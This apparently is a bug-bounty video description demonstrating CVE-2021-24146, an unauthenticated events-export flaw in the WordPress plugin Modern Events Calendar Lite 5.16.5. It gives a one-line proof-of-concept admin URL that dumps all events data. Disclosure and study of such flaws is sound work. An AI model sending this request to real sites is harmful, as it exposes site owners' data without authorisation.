CVE 2021-24146 POC Exploit Video #bugbounty​ #cybersecurity​ #0xd3vil​ #infosec​ #CVE​ #hacking



Hii, I am Vivek Kumar Yadav aka 0xd3vil, In this video i demonstrated How to Exploit CVE-2021-24146 “Modern Events Calendar Lite 5.16.5 – Unauthenticated Events Export” Hope you will enjoy 🙂

* Description: The plugin did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.

POC: /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml

thanks,
-0xd3vil

#tags​#tags​​#bugbounty​​ #cybersecurity​​ #poc​​ #0xd3vil​​ #bypass403​​ #pocvideo​​ #bugpoc​​#hacking​​ #hacker​​ #hackers​​ #bugbountytoturial​​ #bypass​​ #403bypass​​ #github​​ #hackerone​​ #bugcrowd​​ #vrp​​ #toturial​​ #computer​​ #linux

source